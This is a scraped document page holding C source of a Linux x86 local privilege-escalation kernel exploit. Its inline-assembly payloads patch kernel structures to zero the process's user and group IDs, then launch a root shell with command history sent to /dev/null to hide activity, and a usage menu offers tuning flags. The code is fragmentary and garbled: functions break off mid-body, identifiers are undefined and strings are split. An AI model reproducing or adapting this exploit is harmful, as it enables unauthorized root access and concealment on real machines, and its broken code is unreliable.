Beruflich Dokumente
Kultur Dokumente
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <asm/unistd.h>
#ifndef __USE_GNU
#define __USE_GNU
#endif
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
/**
* Relationship Variables
*
* 1: CONFIG_X86_PAE
* see /lib/modules/`uname -r`/build/.config
* 1.1: pse
* 2: THREAD_SIZE
* see include/asm/thread_info.h THREAD_SIZE define
*/
#define _capget_macro(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ( "int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
__syscall_return(type,__res); \
}
static inline _capget_macro(int,capget,void *,a,void *,b);
static int THREAD_SIZE_MASK =(-4096);
static void
fatal(const char *message)
{
system("uname -a");
printf("[-] %s\n",message);
exit(1);
}
void kernel(unsigned * task)
{
unsigned * addr = task;
/* looking for uids */
*clear1 = 0;
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid
)
addr++;
addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}
void kcode(void);
void __kcode(void)
{
asm(
"kcode: \n"
"cld \n"
" pusha \n"
" pushl %es \n"
" pushl %ds \n"
" movl %ss,%edx \n"
" movl %edx,%es \n"
" movl %edx,%ds \n");
__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
asm(
" andl %esp,%eax \n"
" pushl (%eax) \n"
" call kernel \n"
" addl $4, %esp \n"
" popl %ds \n"
" popl %es \n"
" popa \n"
" cli \n"
" iret \n"
);
}
void stub(void);
void __stub(void)
{
asm (
"stub:;"
" pusha;"
);
__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
asm(
" and %esp, %eax;"
" pushl (%eax);"
" call raise_cap;"
" pop %eax;"
" popa;"
" iret;"
);
}
static void
error(int d)
{
printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?
\n");
exit(1);
}
char *bashargv[] = { KRADPS1, NULL };
char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BA
SH_HISTORY=/dev/null",
"HISTORY=/dev/null", "history=/dev/null"
,"HISTFILE=/dev/null",
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr
/local/bin:/usr/local/sbin", NULL };
static int
exploit(unsigned kernelbase, int npages)
{
struct idt *idt;
struct idtr idtr;
signal(SIGSEGV, error);
signal(SIGBUS, error);
static void
usage(char *n)
{
printf("\nUsage: %s\n",n);
printf("\t-s forced cpu flag pse \n");
printf("\t-a define CONFIG_X86_PAE,default none\n");
printf("\t-e <num> have two kernel code,default 0\n");
printf("\t-p <num> alloc pages(4k) ,default 1. Increase from 1 to 7\n"
"\t\tThe higher number the more likely it will crash\n");
printf("\t-t <num> default 0 \n"
"\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n");
printf("\n");
_exit(1);
}